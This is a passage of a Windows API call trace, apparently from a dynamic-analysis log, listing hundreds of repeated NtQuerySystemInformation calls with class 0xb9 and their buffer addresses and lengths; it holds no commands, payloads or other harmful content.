NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0273.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0273.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0273.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0273.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x20, ResultLength=0x0) [0273.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0273.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0273.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x58, ResultLength=0x0) [0273.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0273.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0273.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0273.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0273.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0273.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x20, ResultLength=0x0) [0273.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0273.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x20, ResultLength=0x0) [0273.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0273.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0273.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x58, ResultLength=0x0) [0273.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0273.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x28, ResultLength=0x0) [0273.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x28, ResultLength=0x0) [0273.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x28, ResultLength=0x0) [0273.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x28, ResultLength=0x0) [0273.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x28, ResultLength=0x0) [0273.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0273.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0273.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x28, ResultLength=0x0) [0273.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x28, ResultLength=0x0) [0273.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0273.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0273.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x20, ResultLength=0x0) [0273.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7f0, Length=0x20, ResultLength=0x0) [0273.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7f0, Length=0x20, ResultLength=0x0) [0273.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7f0, Length=0x20, ResultLength=0x0) [0273.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0273.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0273.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0273.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0273.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0273.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0273.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0273.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0273.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0273.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0273.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0273.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0273.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0273.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8f0, Length=0x20, ResultLength=0x0) [0273.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8f0, Length=0x20, ResultLength=0x0) [0273.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x50, ResultLength=0x0) [0273.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd80, Length=0x38, ResultLength=0x0) [0273.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x28, ResultLength=0x0) [0273.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x28, ResultLength=0x0) [0273.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x28, ResultLength=0x0) [0273.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x28, ResultLength=0x0) [0273.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x28, ResultLength=0x0) [0273.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd80, Length=0x38, ResultLength=0x0) [0273.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x28, ResultLength=0x0) [0273.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x28, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd80, Length=0x38, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x20, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0273.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd80, Length=0x38, ResultLength=0x0) [0273.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x20, ResultLength=0x0) [0273.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb90, Length=0x20, ResultLength=0x0) [0273.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb90, Length=0x20, ResultLength=0x0) [0273.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x50, ResultLength=0x0) [0273.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0273.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0273.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0273.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.051] NtQuerySystemInformation 